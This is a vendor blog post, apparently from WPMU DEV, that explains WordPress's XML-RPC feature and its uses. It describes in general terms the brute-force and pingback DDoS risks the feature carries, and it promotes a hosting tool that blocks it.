Enhance Hosting Security For WordPress Sites Automatically With New Block XMLRPC Tool

G2 Spring Awards 2023 - How WPMU DEV Performed

If offering your clients impregnable hosting security for their WordPress websites without lifting a finger sounds great, you’re going to love Block XML-RPC … our newest weapon against XML-RPC attacks!

Block XML-RPC … find out what it means to me!

Since its inception, WordPress has allowed users to interact remotely with their sites using a built-in feature called XML-RPC. This is not only wonderful for smartphone users who want to blog on the go … but hackers too!

In this article, we’ll cover everything you need to know about XML-RPC and show you how to easily and automatically protect WordPress sites hosted with WPMU DEV from hackers exploiting XML-RPC vulnerabilities using our latest hosting security tool.

We’ll also show you how to protect WordPress sites hosted elsewhere.

Read on or click on a link below to skip the basics and get to the good stuff:

The Basics:

The Good Stuff:

Let’s jump right in …

What Is XML-RPC?

XML-RPC is a remote procedure call (RPC) protocol that uses XML to encode its calls and HTTP as a transport mechanism.

In simple and practical terms, XML-RPC is used for enabling external applications to interact with your WordPress site. This includes actions like posting content, fetching posts, and managing comments remotely, without using the WordPress web interface.

WordPress supports XML-RPC through a file called xmlrpc.php, which can be found in the root directory of every WordPress install. In fact, WordPress support for XML-RPC has been a part of WordPress even before WordPress officially became WordPress.

xmlrpc.php fileThe file xmlrpc.php is found in every install of WP.

You can learn more about XML-RPC and WordPress on this post: XML-RPC and Why It’s Time to Remove it for WordPress Security.

What Is XML-RPC Used For?

If you need to access your WordPress website, but you’re nowhere near your computer, XML-RPC facilitates remote content management and integration with third-party applications and streamlines the process of managing WordPress sites without direct access to the admin dashboard.

WordPress users can benefit from using XML-RPC in areas like:

  • Mobile Blogging: Publish posts, edit pages, and upload media files remotely using the WordPress mobile app or other mobile apps.
  • Integration with Desktop Blogging Clients: Applications like Windows Live Writer or MarsEdit allow users to write and publish content from their desktops.
  • Integration with Services: Make connections to services like IFTTT
  • Remote Management Tools: Enable the management of multiple WordPress sites from a single dashboard.
  • Trackbacks and Pingbacks used by other sites to refer to your site.

Despite losing its popularity to newer, more efficient, and more secure APIs built on standards like REST or GraphQL and no longer being supported by PHP from version 8.0 onward, XML-RPC is still widely used in WordPress as it is integrated into many existing systems.

XML-RPC and WordPress Security

If you are using the WordPress mobile app, want to make connections to services like IFTTT, or want to access and publish to your blog remotely, then you need XML-RPC enabled. Otherwise it’s just another portal for hackers to target and exploit.

Pros and Cons of Using XML-RPC

The pros of using XML-RPC are mostly convenience and efficiency.

Though most applications can use the WordPress API instead of XML-RPC, some may still require access to xmlrpc.php and use it to ensure backward compatibility with actively installed older versions.

It’s important, however, to know the cons of using XML-RPC.

Basically, XML-RPC is an outdated protocol with inherent security flaws.

These include:

  • Security Risk: XML-RPC can be exploited for large scale brute force attacks, as it allows unlimited login attempts. Attackers have used XML-RPC functionality to execute widespread brute force attacks against WordPress sites. By leveraging the system.multicall method, attackers can test thousands of password combinations with a single request.
  • Performance: XML-RPC can be a vector for DDoS attacks through the pingback feature, turning unsuspecting WordPress sites into bots against targeted domains, and potentially slowing down or crashing the site.

How to Check if XML-RPC is Enabled/Disabled on WordPress Sites

You can use an XML-RPC validation tool to check whether your WordPress site has XML-RPC enabled or disabled.

WordPress XML-RPC Validation Service toolA validation tool like xmlrpc.blog lets you easily check whether XML-RPC is enabled on your site.

Enter your URL into the Address field and click the Check button.